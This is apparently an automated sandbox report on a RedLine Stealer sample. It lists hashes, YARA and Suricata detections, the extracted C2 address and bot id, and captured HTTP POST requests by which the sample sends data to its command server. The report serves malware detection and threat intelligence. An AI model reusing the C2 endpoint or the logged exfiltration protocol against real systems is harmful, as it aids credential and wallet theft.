Edit tour

Windows Analysis Report
9dOKGgFNL2.exe

Overview

General Information

Sample name:	9dOKGgFNL2.exe renamed because original name is a hash value
Original sample name:	020ec1df3b8b9d28da16edaf0d50a262.exe
Analysis ID:	1557008
MD5:	020ec1df3b8b9d28da16edaf0d50a262
SHA1:	b9b841c39445febc098f7edbda4112194615fc10
SHA256:	6eaf9b6af911a7995d490906ff5d42a36a47e4b1d4510f6fc33c7cdab2c80aae
Tags:	exeRedLineStealeruser-abuse_ch
Infos:

Detection

RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected RedLine Stealer

.NET source code contains potential unpacker

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses known network protocols on non-standard ports

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

9dOKGgFNL2.exe (PID: 7536 cmdline: "C:\Users\user\Desktop\9dOKGgFNL2.exe" MD5: 020EC1DF3B8B9D28DA16EDAF0D50A262)

9dOKGgFNL2.exe (PID: 7712 cmdline: "C:\Users\user\Desktop\9dOKGgFNL2.exe" MD5: 020EC1DF3B8B9D28DA16EDAF0D50A262)

conhost.exe (PID: 7728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["45.137.22.126:55615"], "Bot Id": "cheat"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.1857246057.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.1857246057.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000002.00000002.1857246057.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x133ca:$a4: get_ScannedWallets 0x12228:$a5: get_ScanTelegram 0x1304e:$a6: get_ScanGeckoBrowsersPaths 0x10e6a:$a7: <Processes>k__BackingField 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1079e:$a9: <ScanFTP>k__BackingField
00000000.00000002.1741382956.0000000004491000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1741382956.0000000004491000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000002.1741382956.0000000004491000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x133b2:$a4: get_ScannedWallets 0x12210:$a5: get_ScanTelegram 0x13036:$a6: get_ScanGeckoBrowsersPaths 0x10e52:$a7: <Processes>k__BackingField 0xed64:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x10786:$a9: <ScanFTP>k__BackingField
00000000.00000002.1741382956.000000000458A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1741382956.000000000458A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000002.1741382956.000000000458A000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x13cba:$a4: get_ScannedWallets 0x2bada:$a4: get_ScannedWallets 0x12b18:$a5: get_ScanTelegram 0x2a938:$a5: get_ScanTelegram 0x1393e:$a6: get_ScanGeckoBrowsersPaths 0x2b75e:$a6: get_ScanGeckoBrowsersPaths 0x1175a:$a7: <Processes>k__BackingField 0x2957a:$a7: <Processes>k__BackingField 0xf66c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x2748c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1108e:$a9: <ScanFTP>k__BackingField 0x28eae:$a9: <ScanFTP>k__BackingField
Process Memory Space: 9dOKGgFNL2.exe PID: 7536	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 9dOKGgFNL2.exe PID: 7536	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: 9dOKGgFNL2.exe PID: 7536	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: 9dOKGgFNL2.exe PID: 7536	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x28e8d:$a4: get_ScannedWallets 0x6a814:$a4: get_ScannedWallets 0x27d34:$a5: get_ScanTelegram 0x696bb:$a5: get_ScanTelegram 0x28b16:$a6: get_ScanGeckoBrowsersPaths 0x6a49d:$a6: get_ScanGeckoBrowsersPaths 0x269c7:$a7: <Processes>k__BackingField 0x6834e:$a7: <Processes>k__BackingField 0x23efa:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x65881:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x262fb:$a9: <ScanFTP>k__BackingField 0x67c82:$a9: <ScanFTP>k__BackingField
Process Memory Space: 9dOKGgFNL2.exe PID: 7712	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 9dOKGgFNL2.exe PID: 7712	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: 9dOKGgFNL2.exe PID: 7712	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x5a39f:$a4: get_ScannedWallets 0x59246:$a5: get_ScanTelegram 0x5a028:$a6: get_ScanGeckoBrowsersPaths 0x57ed9:$a7: <Processes>k__BackingField 0x5540c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x5780d:$a9: <ScanFTP>k__BackingField
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.9dOKGgFNL2.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.9dOKGgFNL2.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
2.2.9dOKGgFNL2.exe.400000.0.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField
2.2.9dOKGgFNL2.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165ea:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165cb:$v2_6: GetUpdates
0.2.9dOKGgFNL2.exe.458a6f0.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.9dOKGgFNL2.exe.458a6f0.2.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.9dOKGgFNL2.exe.458a6f0.2.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x117ca:$a4: get_ScannedWallets 0x10628:$a5: get_ScanTelegram 0x1144e:$a6: get_ScanGeckoBrowsersPaths 0xf26a:$a7: <Processes>k__BackingField 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xeb9e:$a9: <ScanFTP>k__BackingField
0.2.9dOKGgFNL2.exe.458a6f0.2.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xe68a:$u7: RunPE 0x11d41:$u8: DownloadAndEx 0x7330:$pat14: , CommandLine: 0x11279:$v2_1: ListOfProcesses 0xe88b:$v2_2: get_ScanVPN 0xe92e:$v2_2: get_ScanFTP 0xf61e:$v2_2: get_ScanDiscord 0x1060c:$v2_2: get_ScanSteam 0x10628:$v2_2: get_ScanTelegram 0x106ce:$v2_2: get_ScanScreen 0x11416:$v2_2: get_ScanChromeBrowsersPaths 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths 0x11709:$v2_2: get_ScanBrowsers 0x117ca:$v2_2: get_ScannedWallets 0x117f0:$v2_2: get_ScanWallets 0x11810:$v2_3: GetArguments 0xfed9:$v2_4: VerifyUpdate 0x147ea:$v2_4: VerifyUpdate 0x11bca:$v2_5: VerifyScanRequest 0x112c6:$v2_6: GetUpdates 0x147cb:$v2_6: GetUpdates
0.2.9dOKGgFNL2.exe.45a2510.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.9dOKGgFNL2.exe.45a2510.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.9dOKGgFNL2.exe.45a2510.1.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x117ca:$a4: get_ScannedWallets 0x10628:$a5: get_ScanTelegram 0x1144e:$a6: get_ScanGeckoBrowsersPaths 0xf26a:$a7: <Processes>k__BackingField 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xeb9e:$a9: <ScanFTP>k__BackingField
0.2.9dOKGgFNL2.exe.45a2510.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xe68a:$u7: RunPE 0x11d41:$u8: DownloadAndEx 0x7330:$pat14: , CommandLine: 0x11279:$v2_1: ListOfProcesses 0xe88b:$v2_2: get_ScanVPN 0xe92e:$v2_2: get_ScanFTP 0xf61e:$v2_2: get_ScanDiscord 0x1060c:$v2_2: get_ScanSteam 0x10628:$v2_2: get_ScanTelegram 0x106ce:$v2_2: get_ScanScreen 0x11416:$v2_2: get_ScanChromeBrowsersPaths 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths 0x11709:$v2_2: get_ScanBrowsers 0x117ca:$v2_2: get_ScannedWallets 0x117f0:$v2_2: get_ScanWallets 0x11810:$v2_3: GetArguments 0xfed9:$v2_4: VerifyUpdate 0x147ea:$v2_4: VerifyUpdate 0x11bca:$v2_5: VerifyScanRequest 0x112c6:$v2_6: GetUpdates 0x147cb:$v2_6: GetUpdates
0.2.9dOKGgFNL2.exe.45a2510.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.9dOKGgFNL2.exe.45a2510.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.9dOKGgFNL2.exe.45a2510.1.raw.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField
0.2.9dOKGgFNL2.exe.45a2510.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165ea:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165cb:$v2_6: GetUpdates
0.2.9dOKGgFNL2.exe.458a6f0.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.9dOKGgFNL2.exe.458a6f0.2.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.9dOKGgFNL2.exe.458a6f0.2.raw.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x2b3ea:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x2a248:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x2b06e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0x28e8a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x26d9c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField 0x287be:$a9: <ScanFTP>k__BackingField
0.2.9dOKGgFNL2.exe.458a6f0.2.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x282aa:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x2b961:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x20f50:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x2ae99:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x284ab:$v2_2: get_ScanVPN 0x2854e:$v2_2: get_ScanFTP
Click to see the 15 entries

Suricata Signatures

ET MALWARE RedLine Stealer - CheckConnect Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-17T03:07:08.476379+0100	2045000	1	Malware Command and Control Activity Detected	45.137.22.126	55615	192.168.2.4	49733	TCP

ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-17T03:07:11.420400+0100	2046056	1	A Network Trojan was detected	45.137.22.126	55615	192.168.2.4	49733	TCP

ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-17T03:07:11.420400+0100	2045001	1	Malware Command and Control Activity Detected	45.137.22.126	55615	192.168.2.4	49733	TCP

ETPRO MALWARE RedLine - CheckConnect Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-17T03:07:03.465942+0100	2849662	1	Malware Command and Control Activity Detected	192.168.2.4	49733	45.137.22.126	55615	TCP

ETPRO MALWARE RedLine - EnvironmentSettings Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-17T03:07:08.786615+0100	2849351	1	Malware Command and Control Activity Detected	192.168.2.4	49733	45.137.22.126	55615	TCP

ETPRO MALWARE RedLine - GetUpdates Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-17T03:07:13.993295+0100	2848200	1	Malware Command and Control Activity Detected	192.168.2.4	49738	45.137.22.126	55615	TCP

ETPRO MALWARE RedLine - SetEnvironment Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-17T03:07:11.473182+0100	2849352	1	Malware Command and Control Activity Detected	192.168.2.4	49737	45.137.22.126	55615	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 2.2.9dOKGgFNL2.exe.400000.0.unpack

Malware Configuration Extractor: RedLine {"C2 url": ["45.137.22.126:55615"], "Bot Id": "cheat"}

Multi AV Scanner detection for submitted file

Source: 9dOKGgFNL2.exe	ReversingLabs: Detection: 66%
Source: 9dOKGgFNL2.exe	Virustotal: Detection: 62%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: 9dOKGgFNL2.exe

Joe Sandbox ML: detected

Source: 9dOKGgFNL2.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 9dOKGgFNL2.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: nmYV.pdb source: 9dOKGgFNL2.exe
Source:	Binary string: nmYV.pdbSHA256 source: 9dOKGgFNL2.exe

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49733 -> 45.137.22.126:55615
Source: Network traffic	Suricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 45.137.22.126:55615 -> 192.168.2.4:49733
Source: Network traffic	Suricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.4:49733 -> 45.137.22.126:55615
Source: Network traffic	Suricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.4:49737 -> 45.137.22.126:55615
Source: Network traffic	Suricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 45.137.22.126:55615 -> 192.168.2.4:49733
Source: Network traffic	Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 45.137.22.126:55615 -> 192.168.2.4:49733
Source: Network traffic	Suricata IDS: 2848200 - Severity 1 - ETPRO MALWARE RedLine - GetUpdates Request : 192.168.2.4:49738 -> 45.137.22.126:55615

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 45.137.22.126:55615

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49738

Source: global traffic

TCP traffic: 192.168.2.4:49733 -> 45.137.22.126:55615

Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 45.137.22.126:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 45.137.22.126:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 45.137.22.126:55615Content-Length: 928651Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 45.137.22.126:55615Content-Length: 928643Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: Joe Sandbox View

ASN Name: ROOTLAYERNETNL ROOTLAYERNETNL

Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.126
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.126
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.126
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.126
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.126
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.126
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.126
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.126
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.126
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.126
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.126
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.126
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.126
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.126
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.126
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.126
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.126
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.126
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.126
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.126
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.126
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.126
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.126
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.126
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.126
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.126
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.126
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.126
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.126
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.126
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.126
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.126
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.126
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.126
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.126
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.126
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.126
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.126
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.126
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.126
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.126
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.126
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.126
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.126
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.126
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.126
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.126
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.126
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.126
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.126

Source: global traffic

DNS traffic detected: DNS query: api.ip.sb

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 45.137.22.126:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000003103000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.137.22.126:5
Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.137.22.126:55615
Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.137.22.126:55615/
Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.137.22.126:55615t-fq
Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002FB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002FB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/0
Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
